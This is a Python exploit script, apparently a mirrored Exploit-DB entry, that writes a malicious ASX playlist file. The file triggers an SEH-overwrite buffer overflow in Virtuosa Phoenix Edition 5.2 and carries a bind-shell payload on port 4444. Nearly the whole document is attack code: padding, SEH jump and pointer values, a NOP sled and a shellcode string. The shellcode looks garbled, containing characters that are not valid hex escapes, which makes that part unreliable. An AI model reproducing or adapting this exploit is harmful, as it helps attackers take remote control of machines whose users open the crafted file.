Virtuosa Phoenix Edition 5.2 – ASX Buffer Overflow (SEH)

  • 作者: Acidgen
    日期: 2011-01-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16070/
  • #!/usr/bin/python
    
    # Exploit Title: Virtuosa Phoenix Edition 5.2 ASX BOF SEH Overwrite 
    # Date found: Aug 16th 2010
    # Author: Acidgen
    # Software Link: http://download1.virtuosa.com/VirtuosaTrial.exe
    # Version: 5.2
    # Tested on: Windows XP SP2
    # Virtuosa - File > Import> Import song or video file from Playlists
    
    junkA = '\x41' * 1021
    junkB = '\x42' * 8979
    nSEH= '\xeb\x06\xff\xff'
    SEH = '\x7e\xaa\x01\x10'
    nop = '\x90' * 10
    getpc="\xd9\xeb\x9b\xd9\x74\x24\xf4\x5b"
    addebx="\x83\xc3\x0b"
    # Bindshell port 4444
    sc = ("j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upjb4c94oe246b3gk53590ofo4317dn40x081dkb19056k05oe8elx2c0e64j810ng4g0b2864mx716d5b7g2k0f1g7f8g2x7cmd58k809jfmxj19emx3g8x0b0269lejg82mg3b800bk3n90f4b2xj0o543689xkc82jb5xjg84l0619e7x29214enb930482mf817x7b0d1e0e130bj4jxj3obk95flb3k0b1b7x0e90j9m55b0dm08f8cj29c105cm0m9kk53n088n1nx6kn82fjf994d645xm4lk1k94kx44ng5e1e4bm81xm4jg1goxo1o344k9kd7b4f72l554o3jdje791xj0n002lbm9m15c8glejfk1kd9bm23f432d40858kj18e809f5bob1x285f6k9xkgldm15f49j5o30b52jdjb2xk26089jejg0km30xn3595kjbkdlx4191o1o42d817gmfj82520kf2djb744do338j28fnf7c13782e7152mf21ndm0nf0860k22301odlej3n0154dk27g3f3kj10k3k835919kdkxob28o09c9892kgm9lencl31ekgnemg756c5x841b4dlk734k945k60k3m910jejd1boe349d7b58mk530gkgob58ok085kjk7g492e4d228e8260jbl809l17do43f2d832g648x9b7929437f38k4j45242o099803f5")
    asxheader=("<ASX version = '3.0'>" + "\r\n"
    "<Title>ASX BOF SEH Overwrite Exploit</Title>" + "\r\n"
    "<Abstract>Perhaps it is, what do you think?</Abstract>" +"\r\n"
    "<MoreInfo href = 'http://google.com" + "\r\n"
    "\r\n"
    "<Entry>" + "\r\n"
    "<Title>How the hacker took over Virtuosa</Title>" + "\r\n"
    "<Author>Lucas Lundgren - acidgen [at] grayhat [onedot] se</Author>" + "\r\n"
    '<Ref href="https://www.exploit-db.com/exploits/16070/'+junkA+nSEH+SEH+nop+getpc+addebx+sc+junkB+'"'+"/>" + "\r\n"
    "</Entry>"+"\r\n"
    "</ASX>"
    "\r\n\r\n")
    filename = "asxcrash.asx"
    print "[-]Virtuosa Phoenix Edition 5.2 ASX BOF SEH Overwrite"
    print "[*]Generating exploit...\n"
    file = open(filename,"w")
    file.writelines(asxheader)
    file.close()
    print "[*]Done...\n"